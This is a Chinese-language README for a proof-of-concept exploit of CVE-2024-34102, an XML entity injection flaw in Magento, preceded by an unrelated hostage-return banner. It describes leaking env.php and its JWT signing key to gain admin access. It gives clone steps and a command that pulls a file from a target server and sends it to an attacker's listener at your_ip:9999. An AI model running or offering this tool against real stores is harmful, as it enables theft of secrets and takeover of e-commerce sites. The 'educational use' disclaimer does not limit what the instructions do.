我们要求安全归还所有被恐怖组织哈马斯劫持为人质的公民。在所有被劫持者获释并安全回家之前,我们不会停歇。你可以帮助他们回家。 https://stories.bringthemhomenow.net/
本仓库包含针对 Magento 中严重 XML 实体注入漏洞(CVE-2024-34102)的概念验证(PoC)利用代码。该漏洞允许敏感文件的泄露,进而可被利用来获取对 Magento 管理功能的未授权访问。此利用代码仅用于教育目的,请负责任地使用。
Magento 是全球最流行的电子商务解决方案之一。2024 年 6 月,发现了一个严重的预认证 XML 实体注入问题,编号为 CVE-2024-34102。该漏洞可能导致严重后果,包括泄露 Magento 中的 app/etc/env.php 文件,该文件包含用于签署 JWT 的加密密钥。
requests 库()pip install requests克隆仓库:
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
使用必要参数执行脚本:
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url:目标 Magento 实例的 URL。--target-file:目标服务器上要泄露的文件路径。--exfil-url:用于接收泄露数据的 URL。python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999